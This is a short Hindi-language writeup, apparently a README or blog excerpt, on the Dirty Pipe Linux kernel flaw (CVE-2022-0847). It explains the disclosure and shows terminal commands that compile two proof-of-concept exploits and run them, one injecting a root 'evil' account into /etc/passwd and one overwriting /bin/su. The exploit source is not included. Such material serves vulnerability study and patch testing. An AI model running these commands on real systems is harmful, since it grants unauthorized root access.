
CVE-2022-0847 (डर्टी पाइप) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो Linux कर्नेल 5.8+ पर केवल-पठनीय फ़ाइलों या SUID बाइनरी को अधिलेखित करके स्थानीय विशेषाधिकार वृद्धि सक्षम करता है।
आज, सुरक्षा शोधकर्ता Max Kellermann ने जिम्मेदारीपूर्वक 'Dirty Pipe' कमजोरी का खुलासा किया और कहा कि यह Linux Kernel 5.8 और बाद के संस्करणों को प्रभावित करती है, यहां तक कि Android उपकरणों पर भी।
इस कमजोरी को CVE-2022-0847 के रूप में ट्रैक किया जाता है और यह एक गैर-विशेषाधिकार प्राप्त उपयोगकर्ता को केवल-पढ़ने योग्य फाइलों में डेटा इंजेक्ट और ओवरराइट करने की अनुमति देती है, जिसमें रूट के रूप में चलने वाली SUID प्रक्रियाएं शामिल हैं।
Kellerman ने अपने एक ग्राहक के वेब सर्वर एक्सेस लॉग को दूषित कर रहे एक बग का पता लगाने के बाद इस बग की खोज की।
फिर Bl4sty ने एक और संस्करण लिखा। /etc/passwd जैसी फाइल को ओवरराइट करने के बजाय, यह उपयोगकर्ता-निर्दिष्ट SUID बाइनरी (जैसे /bin/su) को ओवरराइट करता है, शेलकोड इंजेक्ट करता है जो फिर विशेषाधिकार प्राप्त उपयोगकर्ता (अर्थात रूट) अनुमतियों के साथ निष्पादित होता है।
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su
विस्तृत उपयोग के लिए देखें: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf